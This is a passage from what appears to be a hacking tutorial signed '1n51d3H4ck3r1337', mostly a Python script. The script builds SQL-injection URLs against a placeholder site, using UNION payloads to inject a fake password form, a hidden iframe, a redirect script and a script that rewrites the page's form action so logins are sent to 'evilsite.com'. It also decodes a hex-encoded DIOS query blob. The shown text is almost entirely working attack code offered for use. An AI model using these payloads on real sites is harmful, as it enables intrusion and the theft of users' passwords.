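    'Password :<input type="text" name="password">'
    '<input type="submit"></form><iframe height=0 width=0>'
)
IFRAME_PAYLOAD = ('<br><iframe src="http://www.evilsite.com/fakepage.php" height=300 width=300 '
                  'frameBorder="0" scrolling="no"></iframe>')
REDIRECT_PAYLOAD = '<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>'
REWRITE_PAYLOAD = ('<script>document.getElementsByTagName("form")[0].action='
                   '"http://www.evilsite.com/fakepage.php"</script>')


def page_urls(base="http://exploitable-web.com/link.php", param="id"):
    """One injected URL per attack variant described on the page."""
    return {name: inject_url(base, param, union_payload(html))
            for name, html in [("form", FORM_PAYLOAD), ("iframe", IFRAME_PAYLOAD),
                               ("redirect", REDIRECT_PAYLOAD), ("rewrite", REWRITE_PAYLOAD)]}


if __name__ == "__main__":
    for name, url in page_urls().items():
        print(name, url)
    # decode a blob from the final DIOS query above
    print(from_hex_literal("0x496e6a3363743364206279205a656e"))
```

Feed from_hex_literal() the 0x... pieces of the final DIOS query to see exactly what HTML a payload writes into the page before you send it; a mistyped hex digit produces a MySQL syntax error rather than a useful result.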

Enjoy Hacking with 1n51d3H4ck3r1337.